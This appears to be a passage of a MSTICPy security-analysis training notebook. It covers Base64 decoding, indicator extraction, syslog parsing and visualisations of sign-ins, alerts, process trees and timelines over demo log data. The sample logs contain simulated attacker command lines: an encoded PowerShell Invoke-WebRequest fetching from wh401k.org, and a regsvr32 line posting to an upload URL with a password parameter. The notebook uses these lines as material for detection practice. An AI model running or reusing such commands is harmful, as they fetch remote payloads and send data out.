4 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\MSTICAlertsWin1$ 4688 2/10/19 3:48 PM MSTICAlertsWin1 S-1-5-20 MSTICAlertsWin1$ WORKGROUP 0x3e4 0x2364 C:\Windows\System32\reg.exe %%1936 0x1c24 reg "C:\diagnostics\WinBenignActivity.cmd" -25563 /10689 C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 48:18.4

Now that we have some data, we can call base64.unpack_df and tell it to unpack data found in the 'CommandLine' column. This feature will look for Base64 patterns in that column, attempt to unpack any it finds and present us with the decoded output.

base64.unpack_df outputs only the elements relevant to the decoded string. To get some context on where each string was found, we next join the output back to the original dataset so that we can see the log event and the decoded string together.
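
To make the decoding step concrete, here is a rough standard-library sketch of the idea: find Base64-looking runs with a regular expression, then try to decode each one. It is an illustration only and not how `base64.unpack_df` is implemented; the `B64_PATTERN` regex, the 16-character minimum and the `decode_base64_candidates` helper are assumptions made for this example. The sample string is one of the encoded command lines from the lab data.

```python
import base64
import binascii
import re

# Runs of at least 16 Base64 characters, with optional padding
B64_PATTERN = re.compile(
    r"(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"
)


def decode_base64_candidates(text):
    """Return (encoded, decoded) pairs for substrings that decode as UTF-8."""
    decoded_pairs = []
    for candidate in B64_PATTERN.findall(text):
        try:
            raw = base64.b64decode(candidate, validate=True)
            decoded_pairs.append((candidate, raw.decode("utf-8")))
        except (binascii.Error, UnicodeDecodeError):
            continue  # looked like Base64 but did not decode cleanly
    return decoded_pairs


command_line = "cGluZyAgbWljcm9zb2Z0LmNvbSAtbiAxNSA="
for encoded, decoded in decode_base64_candidates(command_line):
    print(repr(decoded))
```

A pattern this loose will also match long ordinary words, which is why each candidate is validated by actually decoding it.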

In [118]:
# Base64 decode
b64df = base64.unpack_df(data=cmdl_data.head(1000), column='CommandLine')

b64df['SourceIndex'] = pd.to_numeric(b64df['src_index'])

merged_df = (cmdl_data
             .merge(right=b64df, how='left', left_index=True, right_on='SourceIndex')
             #.drop(columns=['Unnamed: 0'])
             .set_index('SourceIndex'))

# Show the result of the merge (only those rows that have a value in decoded_string)
merged_filtered = merged_df.dropna(subset=['decoded_string'])[["TimeGenerated", "Account", "Computer", "NewProcessName", "CommandLine_x", "decoded_string"]]

merged_filtered
Out[118]:
TimeGenerated Account Computer NewProcessName CommandLine_x decoded_string
SourceIndex
21 2/10/19 3:50 PM WORKGROUP\MSTICAlertsWin1$ MSTICAlertsWin1 C:\Windows\System32\PING.EXE cGluZyAgbWljcm9zb2Z0LmNvbSAtbiAxNSA= ping microsoft.com -n 15
968 2/9/19 11:26 PM MSTICAlertsWin1\MSTICAdmin MSTICAlertsWin1 C:\W!ndows\System32\powershell.exe .\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2ZpbGUgLUNvbW1hbmQgIkludm9rZS1FeHByZXNzaW9uIEdld... -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:...

Now that we have the decoded string, we can look for any Indicators of Compromise (IoCs) in these strings. Using MSTICPy's IoCExtract we can search all of these decoded strings for things such as IP addresses, file hashes and URLs. You can choose to search specific indicator types by passing the ioc_types parameter but we want to just search for everything.

MSTICPy has a set of common IoC patterns to search for and extract but you can also extend this by adding your own regex patterns with add_ioc_type.
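
The idea of a set of named patterns that can be extended is easy to sketch with the standard library. The code below is a simplified illustration and is not MSTICPy's implementation: the `SimpleIoCExtractor` class, its deliberately loose regular expressions, the `md5_hash` type name and the `example.org` URL are all assumptions made for this example. MSTICPy's own patterns are more thorough.

```python
import re


class SimpleIoCExtractor:
    """Toy indicator extractor with an extensible set of regex patterns."""

    def __init__(self):
        self.patterns = {
            "url": re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE),
            "dns": re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE),
        }

    def add_pattern(self, name, regex):
        """Register an additional indicator type."""
        self.patterns[name] = re.compile(regex)

    def extract(self, text):
        """Return a sorted list of unique (ioc_type, observable) pairs."""
        found = set()
        for ioc_type, pattern in self.patterns.items():
            for match in pattern.findall(text):
                found.add((ioc_type, match))
        return sorted(found)


extractor = SimpleIoCExtractor()
# Custom type: MD5-style hashes (32 hexadecimal characters)
extractor.add_pattern("md5_hash", r"\b[a-fA-F0-9]{32}\b")

print(extractor.extract("ping microsoft.com -n 15"))
print(extractor.extract("Invoke-WebRequest -Uri http://example.org/getps"))
```

Note that a URL yields both a `url` and a `dns` observable, which mirrors the two rows reported for the same source string in the lab output.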

In [108]:
# Extract IoCs
ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=merged_filtered, columns=['decoded_string'])
ioc_df
Out[108]:
IoCType Observable SourceIndex Input
0 dns microsoft.com 21 ping microsoft.com -n 15
1 dns wh401k.org 968 -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:...
2 url http://wh401k.org/getps 968 -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequest -Uri http:...

We can also use domain_utils to get some other information on the domain, such as what IP addresses it resolves to.

In [109]:
from msticpy.sectools.domain_utils import dns_resolve
dns_info = dns_resolve(ioc_df.iloc[0]['Observable'])
display(dns_info)
{'qname': 'microsoft.com.',
 'rdtype': 'A',
 'rdclass': 'IN',
 'response': 'id 38992\nopcode QUERY\nrcode NOERROR\nflags QR RD RA\n;QUESTION\nmicrosoft.com. IN A\n;ANSWER\nmicrosoft.com. 931 IN A 104.215.148.63\nmicrosoft.com. 931 IN A 40.76.4.15\nmicrosoft.com. 931 IN A 40.112.72.205\nmicrosoft.com. 931 IN A 40.113.200.201\nmicrosoft.com. 931 IN A 13.77.161.179\n;AUTHORITY\n;ADDITIONAL',
 'nameserver': '194.168.4.100',
 'port': 53,
 'canonical_name': 'microsoft.com.',
 'rrset': ['104.215.148.63',
  '40.76.4.15',
  '40.112.72.205',
  '40.113.200.201',
  '13.77.161.179'],
 'expiration': datetime.datetime(2022, 2, 9, 23, 14, 5, 373327)}

Lab Exercise 4

Syslog data is a common data source during security analysis. The syslog data structure includes a lot of key information in a single field that can make extraction complicated.
In this exercise you will load syslog data and extract indicators from the SyslogMessage field.

Bonus Task:
Identify the Base64 encoded syslog messages and extract indicators from those as well.

Hint:
  • Syslog data is found under the LinuxSyslog type of queries
  • Core syslog data is stored in the SyslogMessage column
In [134]:
# Load syslog data
sysdf = qry_prov.LinuxSyslog.list_all_syslog_events()
sysdf.head()
Out[134]:
TenantId SourceSystem TimeGenerated Computer EventTime [UTC] Facility HostName SeverityLevel SyslogMessage ProcessID HostIP ProcessName MG Type _ResourceId Source AccountName
0 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:48:01.990 AM SOC-FW-CEF 5/4/2021, 7:48:01.000 AM authpriv SOC-FW-CEF info pam_unix(cron:session): session opened for user root by (uid=0) 11466.0 10.0.1.7 CRON 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
1 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:48:01.993 AM SOC-FW-CEF 5/4/2021, 7:48:01.000 AM authpriv SOC-FW-CEF info pam_unix(cron:session): session closed for user root 11466.0 10.0.1.7 CRON 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
2 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:49:01.990 AM SOC-FW-RSYSLOG 5/4/2021, 7:49:01.000 AM authpriv SOC-FW-RSYSLOG info pam_unix(cron:session): session opened for user root by (uid=0) 111364.0 10.0.1.5 CRON 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
3 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:49:01.990 AM SOC-FW-RSYSLOG 5/4/2021, 7:49:01.000 AM syslog SOC-FW-RSYSLOG info action 'action 2' resumed (module 'builtin:omfile') [v8.32.0 try http://www.rsyslog.com/e/2359 ] NaN 10.0.1.5 rsyslogd 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
4 8ecf8077-cf51-4820-aadd-14040956f35d Linux 5/4/2021, 7:49:01.990 AM SOC-FW-RSYSLOG 5/4/2021, 7:49:01.000 AM syslog SOC-FW-RSYSLOG warn action 'action 2' suspended (module 'builtin:omfile'), retry 0. There should be messages before ... NaN 10.0.1.5 rsyslogd 00000000-0000-0000-0000-000000000002 Syslog /subscriptions/d1d8779d-38d7-4f06-91db-9cbc8de0176f/resourcegroups/soc-fortinet/providers/micros... user user
In [135]:
# Extract URL indicators from the SyslogMessage column and get a unique list of indicators found
#sysdf[ sysdf['SyslogMessage'].str.contains("www") ]['SyslogMessage']

# Use the sysdf DataFrame loaded in the previous cell
ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=sysdf, columns=['SyslogMessage'], ioc_types=['url'])
ioc_df['Observable'].unique()
Out[135]:
array(['http://www.rsyslog.com/e/2359', 'www.rsyslog.com',
       'http://www.rsyslog.com/e/2007', 'http://www.rsyslog.com/e/2106',
       'http://www.microsoft.com', 'www.microsoft.com'], dtype=object)
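
To make the extraction step less of a black box, here is a rough standard-library sketch of pattern-based URL extraction over two of the SyslogMessage values shown earlier. The URL_PATTERN regular expression is a deliberately simplified assumption and is not the pattern IoCExtract uses.

```python
import re

# Simplified URL pattern for illustration; real extractors use stricter rules
URL_PATTERN = re.compile(r"https?://[^\s\]\)'\"<>]+")

# Two SyslogMessage values taken from the sample rows above
messages = [
    "pam_unix(cron:session): session opened for user root by (uid=0)",
    "action 'action 2' resumed (module 'builtin:omfile') "
    "[v8.32.0 try http://www.rsyslog.com/e/2359 ]",
]

# Collect every match, then de-duplicate to get a unique list of indicators
found = [url for msg in messages for url in URL_PATTERN.findall(msg)]
unique_urls = sorted(set(found))
print(unique_urls)
```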
In [136]:
# Decode Base64 data and extract indicators
sys_b64_df = base64.unpack_df(data=sysdf, column='SyslogMessage')

# get a list of decoded strings
sys_b64_df['decoded_string'].unique()

# Extract dns indicators from these strings (use the full_decoded_string column)
ioc_df = ioc_extractor.extract(data=sys_b64_df, columns=['full_decoded_string'], ioc_types=['dns'])
ioc_df
Out[136]:
IoCType Observable SourceIndex Input
0 dns www.github.com 9 <decoded type='string' name='[None]' index='1' depth='1'>The secret URI is www.github.com/micros...
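
The bonus task chains two steps: decode anything that looks like Base64, then run indicator extraction over the decoded text. The sketch below illustrates that idea with the standard library only. The sample message, the 20-character threshold, and both regular expressions are assumptions made for illustration and do not reflect how MSTICPy implements unpack_df or IoCExtract.

```python
import base64
import binascii
import re

# Runs of Base64 alphabet characters long enough to be worth decoding (threshold is an assumption)
B64_CANDIDATE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Simplified domain pattern for illustration only
DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)

def decode_candidates(message):
    """Return the UTF-8 text of every substring that decodes cleanly as Base64."""
    decoded = []
    for candidate in B64_CANDIDATE.findall(message):
        try:
            raw = base64.b64decode(candidate, validate=True)
            decoded.append(raw.decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64, or not text once decoded
    return decoded

# Made-up syslog message carrying an encoded string (hypothetical data)
hidden_text = "The secret URI is www.example.org/path"
message = "cron job output: " + base64.b64encode(hidden_text.encode()).decode()

decoded_strings = decode_candidates(message)
domains = sorted({d.lower() for text in decoded_strings for d in DOMAIN.findall(text)})
print(domains)
```

Ordinary words that happen to be long enough can also match the candidate pattern, which is why failed decodes are skipped silently rather than treated as errors.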

04: Data Visualization¶

Data visualization is a key tool in any data analysis scenario, and the same is true during security analysis. MSTICPy contains a number of visualizations. Below we plot locations on a map to help identify anomalous logon locations, show a graph of security alerts, and plot a process tree showing process executions on a host.

MSTICPy uses Bokeh and Folium to power its visualization features.

The first thing we need to do is get some data to plot. Here we will use Azure AD sign-in events. These events include the location the login occurred from, allowing us to plot them on a map for geospatial analysis.

In [137]:
# Plot IP geolocation on a map
loc_data = qry_prov.Azure.list_all_signins_geo()
loc_data.head()
Out[137]:
TenantId SourceSystem TimeGenerated ResourceId OperationName OperationVersion Category ResultType ResultSignature ResultDescription DurationMs CorrelationId Resource ResourceGroup ResourceProvider Identity Level Location AlternateSignInName AppDisplayName AppId AuthenticationDetails AuthenticationMethodsUsed AuthenticationProcessingDetails AuthenticationRequirement ... NetworkLocationDetails OriginalRequestId ProcessingTimeInMilliseconds RiskDetail RiskEventTypes RiskEventTypes_V2 RiskLevelAggregated RiskLevelDuringSignIn RiskState ResourceDisplayName ResourceIdentity ServicePrincipalId ServicePrincipalName Status TokenIssuerName TokenIssuerType UserAgent UserDisplayName UserId UserPrincipalName AADTenantId Type Result Latitude Longitude
0 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 19:04.4 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] singleFactorAuthentication ... [] f05079ed-f820-4531-ab26-498b53af3800 366 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 42.997181 -86.848312
1 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 32:44.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 d5ef0f81-318f-4881-8df1-8415aab77d1a Microsoft.aadiam Microsoft.aadiam NaN Zack Von 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] NaN ... [] 121dca00-0930-40fe-9b69-bbc1e33c3500 394 none [] NaN none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... Zack Von 2566a1a6-4d03-40d2-8836-6c8cf1ce517f zvon@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 48.614380 -121.110313
2 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 32:44.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 d5ef0f81-318f-4881-8df1-8415aab77d1a Microsoft.aadiam Microsoft.aadiam NaN Zack Von 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] singleFactorAuthentication ... [] 121dca00-0930-40fe-9b69-bbc1e33c3500 394 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... Zack Von 2566a1a6-4d03-40d2-8836-6c8cf1ce517f zvon@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 48.614380 -121.110313
3 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 19:04.4 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 c4b4ea3c-58ff-4e0e-b5b0-d2ea01cce380 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [] NaN ... [] f05079ed-f820-4531-ab26-498b53af3800 366 none [] NaN none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.404... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 42.997181 -86.848312
4 ab86c959-1ba3-495c-a00d-ced30d8825d3 Azure AD 05:35.8 /tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam Sign-in activity 1 SignInLogs 0 None NaN 0 bf124019-b325-4a4a-81ff-6c2823461620 Microsoft.aadiam Microsoft.aadiam NaN CTFUser3 4 US NaN Azure Portal c44b4083-3bb0-49c1-b47d-974e53cbdf3c [] NaN [\r\n {\r\n "key": "Login Hint Present",\r\n "value": "True"\r\n }\r\n] singleFactorAuthentication ... [] 39f36cc7-ad3e-430c-bf78-bc96fbc33300 553 none [] [] none none none Windows Azure Service Management API 797f4846-ba00-4fd7-ba43-dac1f8f63013 NaN NaN {'errorCode': 0} NaN AzureAD Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safa... CTFUser3 acc49186-e946-4f6c-85af-669807da0e0f ctfuser3@seccxp.ninja 4b2462a4-bbee-495a-a0e1-f23ae524cc9c SigninLogs Sucess 41.465630 -73.610718

5 rows × 62 columns

In [138]:
ip_ents = []
def format_ips(row):
    ip_ent = entities.ip_address.Ip(Address=row['IPAddress'])
    loc = entities.GeoLocation(Longitude=float(row['Longitude']), Latitude=float(row['Latitude']))
    ip_ent.Location = loc
    ip_ents.append(ip_ent)
    
# Format dataset into entities
loc_data.apply(format_ips, axis=1)
# Create Map plot
folium_map = FoliumMap(zoom_start=2)
# Add IP entities to the map
folium_map.add_ip_cluster(ip_entities=ip_ents, color="blue")
# Center the map around the plotted entities
folium_map.center_map()
# Display the map
folium_map
Out[138]:
[Interactive Folium map: clustered sign-in IP locations]
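
Alongside the map, one simple way to reason about anomalous logon locations is to measure how far apart two sign-ins by the same account are. The sketch below applies the haversine formula to the Latitude/Longitude values of two CTFUser3 rows from the table above. This is an illustrative calculation and not an MSTICPy feature; the function and variable names are assumptions.

```python
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0  # mean Earth radius

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two (lat, lon) points."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))

# Latitude/Longitude pairs from two CTFUser3 sign-in rows shown above
first_signin = (42.997181, -86.848312)
second_signin = (41.465630, -73.610718)

distance_km = haversine_km(*first_signin, *second_signin)
print(f"Distance between sign-in locations: {distance_km:.0f} km")
```

Combined with the time between the two events, a distance like this could feed an "impossible travel" check, although IP geolocation is approximate and VPN use will produce false positives.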

Another useful visualization is a graph plot that shows connections between events. This is particularly useful when looking at data items such as alerts, which contain a lot of embedded data such as affected hosts and users. By plotting alert data as a graph we can see the connections between alerts, which can help a security analyst get a better understanding of an intrusion.

Using create_alert_graph we can create a NetworkX representation of a security alert, and with add_related_alerts we can link it to our other alerts. We then call draw_alert_entity_graph to display the result.

In [139]:
# Security Alert Graph
alert_df = qry_prov.SecurityAlert.list_alerts()
# Create a Security Alert entity
alert = SecurityAlert(alert_df.iloc[0])
# Create a graph
grph = create_alert_graph(alert)
# Add other alerts to the graph
full_grph = add_related_alerts(alert_df, grph)
# Display the graph
nbdisplay.draw_alert_entity_graph(full_grph, width=15)
Out[139]:
[Bokeh figure: security alert entity graph]
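
The idea behind the alert graph can be shown without any plotting: alerts and the entities they mention form a graph, and two alerts are related when they share an entity. The sketch below uses plain dictionaries and made-up alert data. It is an assumption-laden illustration of the concept, not how create_alert_graph or add_related_alerts are implemented.

```python
from collections import defaultdict

# Hypothetical alerts and the entities they mention (made-up data for illustration)
alerts = {
    "alert-1": {"host-A", "user-x"},
    "alert-2": {"host-A", "user-y"},
    "alert-3": {"host-B", "user-z"},
}

# Bipartite graph: each alert is linked to each of its entities, and back
graph = defaultdict(set)
for alert_id, entity_names in alerts.items():
    for entity in entity_names:
        graph[alert_id].add(entity)
        graph[entity].add(alert_id)

def related_alerts(alert_id):
    """Alerts that share at least one entity with alert_id."""
    related = set()
    for entity in graph[alert_id]:
        related |= graph[entity]
    related.discard(alert_id)
    return sorted(related)

print(related_alerts("alert-1"))
```

Here alert-1 and alert-2 are connected through host-A, while alert-3 stands alone. That is the kind of structure the plotted graph makes visible at a glance.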

Another common visualization in security tooling is the process tree. This shows the hierarchical relationship of processes executed on a host.

MSTICPy has functions to both build and plot these process trees based on Windows process creation events. More details on these functions can be found in the MSTICPy documentation.

In [140]:
# Before plotting a process tree we need to get data related to process creation events
proc_df = qry_prov.WindowsSecurity.get_process_tree()
proc_df.head()
Out[140]:
TenantId Account EventID TimeGenerated Computer SubjectUserSid SubjectUserName SubjectDomainName SubjectLogonId NewProcessId NewProcessName TokenElevationType ProcessId CommandLine ParentProcessName TargetLogonId SourceComputerId TimeCreatedUtc NodeRole Level ProcessId1 NewProcessId1
0 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:38.507 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0x1150 C:\W!ndows\System32\regsvr32.exe %%1936 0x12f4 .\regsvr32 /u /s c:\windows\fonts\csrss.exe "http://www.401k.com/upload?pass=34592389" post C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:38.507 source 0
1 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:37.697 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0x6dc C:\Windows\System32\conhost.exe %%1936 0x12f4 \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:37.697 sibling 1
2 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:38.117 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0x114c C:\Windows\System32\cmd.exe %%1936 0x12f4 cmd /c echo Begin Security Demo tasks C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:38.117 sibling 1
3 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:38.137 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0xfa4 C:\Windows\System32\cmd.exe %%1936 0x12f4 cmd /c echo Any questions about the commands executed here then please contact one of C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:38.137 sibling 1
4 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsWin1\MSTICAdmin 4688 2019-02-14 11:51:38.153 MSTICAlertsWin1 S-1-5-21-996632719-2361334927-4038480536-500 MSTICAdmin MSTICAlertsWin1 0x78225e 0x1164 C:\Windows\System32\cmd.exe %%1936 0x12f4 cmd /c echo timb@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com C:\Windows\System32\cmd.exe 0x0 263a788b-6526-4cdc-8ed9-d79402fe4aa0 2019-02-14 11:51:38.153 sibling 1
In [184]:
## Modified for latest compatibility

# We start by building the process tree

from msticpy.sectools.proc_tree_builder import build_process_tree

p_tree_win = build_process_tree(proc_df, schema=None, debug=False)
# We then identify the root processes and get the descendants of the first root
proc_tree = ptree.get_descendents(p_tree_win, ptree.get_roots(p_tree_win).iloc[0])
# We can then plot the process tree
nbdisplay.plot_process_tree(data=proc_tree, legend_col="SubjectUserName", show_table=True)
Out[184]:
[Bokeh figure: process tree with accompanying data table]
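
To see what building a process tree involves, the sketch below links the first three sample rows above by their process IDs. In Windows event 4688, NewProcessId identifies the created process and ProcessId identifies the process that created it. This is a simplified illustration under that assumption: unlike a real builder, it ignores process ID reuse and timestamps, and the helper names are hypothetical.

```python
from collections import defaultdict

# (NewProcessId, ProcessId, NewProcessName) from the first three sample rows above;
# ProcessId is the ID of the creating (parent) process in event 4688.
events = [
    ("0x1150", "0x12f4", r"C:\W!ndows\System32\regsvr32.exe"),
    ("0x6dc", "0x12f4", r"C:\Windows\System32\conhost.exe"),
    ("0x114c", "0x12f4", r"C:\Windows\System32\cmd.exe"),
]

children = defaultdict(list)  # parent process ID -> child process IDs
names = {}                    # process ID -> image path
for new_pid, parent_pid, image in events:
    children[parent_pid].append(new_pid)
    names[new_pid] = image

def render(pid, depth=0):
    """Return indented lines for pid and all of its descendants."""
    lines = ["  " * depth + f"{pid} {names.get(pid, '(parent not in sample)')}"]
    for child in children.get(pid, []):
        lines.extend(render(child, depth + 1))
    return lines

# Roots are parents that never appear as a newly created process in the sample
roots = [pid for pid in children if pid not in names]
tree_lines = [line for root in roots for line in render(root)]
print("\n".join(tree_lines))
```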

Temporal analysis is another key tool in security investigation. Seeing the order in which events occur, and how they cluster in time, can provide invaluable insights. To help with this, MSTICPy contains a flexible timeline feature that can plot a range of data on a timeline. You can plot simple single-category discrete events, running values, and multi-series events, all in an interactive Bokeh visualization.

Using the timeline is as simple as passing a DataFrame to display_timeline. By default this uses the TimeGenerated column for the time element, and a set of common columns for the values displayed when hovering over an event. These can be customized with the time_column and source_columns parameters (source_columns is used below).

In [185]:
# Get some data to plot
alert_df = qry_prov.SecurityAlert.list_alerts()
# Plot these values on a timeline based on when they were generated
nbdisplay.display_timeline(alert_df, source_columns=["AlertName"])
Out[185]:
[Bokeh figure: timeline of security alerts]

It's also possible to group events by a column to show them as separate rows in the timeline. This is done by passing the column you want to split on as group_by. Below we group by the alert severity.

There are also many other ways to customize this timeline. Please read the full documentation to see a list of options.

In [153]:
nbdisplay.display_timeline(alert_df, source_columns=["AlertName"], group_by="Severity")
Out[153]:
[Bokeh figure: timeline of security alerts grouped by Severity]
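
Conceptually, grouping a timeline means splitting events into one row per distinct value of the chosen column and ordering each row by time. The standard-library sketch below shows that idea on made-up alert records. The data is hypothetical and this is not how display_timeline is implemented.

```python
from collections import defaultdict
from datetime import datetime

# Hypothetical alert records (made-up values for illustration)
alerts = [
    {"TimeGenerated": "2019-02-14 11:51:38", "AlertName": "Suspicious process", "Severity": "High"},
    {"TimeGenerated": "2019-02-14 09:10:02", "AlertName": "Port scan", "Severity": "Low"},
    {"TimeGenerated": "2019-02-14 10:30:45", "AlertName": "Malware detected", "Severity": "High"},
]

# One timeline row per Severity value, each sorted by time
rows = defaultdict(list)
for alert in alerts:
    when = datetime.strptime(alert["TimeGenerated"], "%Y-%m-%d %H:%M:%S")
    rows[alert["Severity"]].append((when, alert["AlertName"]))
for events in rows.values():
    events.sort()

for severity, events in sorted(rows.items()):
    print(severity, [name for _, name in events])
```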

Lab Exercise 5

In this exercise you are going to plot your own timeline of events.
The timeline should plot Windows Host Logon events (.WindowsSecurity.list_host_logons).
You should group these by the logon type, and the hover-over should show the user account logging in and the IP address they logged in from.
Hint:
  • Grouping is passed with the 'group_by' parameter.
  • Hover-over values are set with the 'source_columns' parameter.
In [157]:
# Load data
tl_df = qry_prov.WindowsSecurity.list_host_logons()

# Create timeline lab
nbdisplay.display_timeline(tl_df, source_columns=["SubjectUserName", "IpAddress"], group_by="LogonType")
Out[157]:
[Bokeh figure: timeline of host logon events grouped by LogonType]
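
Grouping by LogonType produces rows labelled with numeric codes, which are easier to read once mapped to the names Windows documents for logon events. The sketch below shows one possible mapping helper. The logon_type_label function and the sample values are illustrative assumptions.

```python
# Windows logon type codes as documented for security event 4624
LOGON_TYPE_NAMES = {
    2: "Interactive",
    3: "Network",
    4: "Batch",
    5: "Service",
    7: "Unlock",
    8: "NetworkCleartext",
    9: "NewCredentials",
    10: "RemoteInteractive",
    11: "CachedInteractive",
}

def logon_type_label(code):
    """Return a readable label for a LogonType value, keeping unknown codes visible."""
    try:
        return LOGON_TYPE_NAMES[int(code)]
    except (KeyError, ValueError, TypeError):
        return f"Unknown ({code})"

# Hypothetical LogonType values as they might appear in a logon DataFrame column
sample_codes = [3, "10", 99]
labels = [logon_type_label(code) for code in sample_codes]
print(labels)
```

With pandas, a helper like this could be applied with tl_df["LogonType"].map(logon_type_label) to create a new column (for example a hypothetical LogonTypeName), which could then be passed as group_by.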

05: Machine Learning using MSTICPy¶

